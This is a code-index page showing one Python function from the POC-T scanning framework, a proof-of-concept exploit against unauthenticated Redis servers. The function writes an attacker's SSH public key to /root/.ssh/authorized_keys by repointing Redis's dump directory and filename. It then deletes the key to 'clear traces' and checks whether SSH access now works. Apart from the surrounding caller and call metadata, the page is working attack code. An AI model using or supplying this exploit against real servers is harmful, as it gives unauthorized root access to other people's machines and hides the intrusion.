hub / github.com/Xyntax/POC-T / poc

Function poc

script/redis-sshkey-getshell.py:29–50
(url)

Source from the content-addressed store, hash-verified

def poc(url):
    url = host2IP(url)
    ip = url.split(':')[0]
    port = int(url.split(':')[-1]) if ':' in url else 6379
    try:
        if not checkPortTcp(ip, 22):
            return False
        r = redis.Redis(host=ip, port=port, db=0)
        if 'redis_version' in r.info():
            key = randomString(10)
            r.set(key, '\n\n' + public_key + '\n\n')
            r.config_set('dir', '/root/.ssh')
            r.config_set('dbfilename', 'authorized_keys')
            r.save()
            r.delete(key)  # clear traces
            r.config_set('dir', '/tmp')
            time.sleep(5)
            if testConnect(ip, 22):
                return True
    except Exception:
        return False
    return False


def testConnect(ip, port=22):
    ...  # body not included in this excerpt

Callers

nothing calls this directly

Calls 8

host2IP · Function · 0.90
checkPortTcp · Function · 0.90
randomString · Function · 0.90
testConnect · Function · 0.85
split · Method · 0.80
info · Method · 0.80
set · Method · 0.80
delete · Method · 0.80

Tested by

no test coverage detected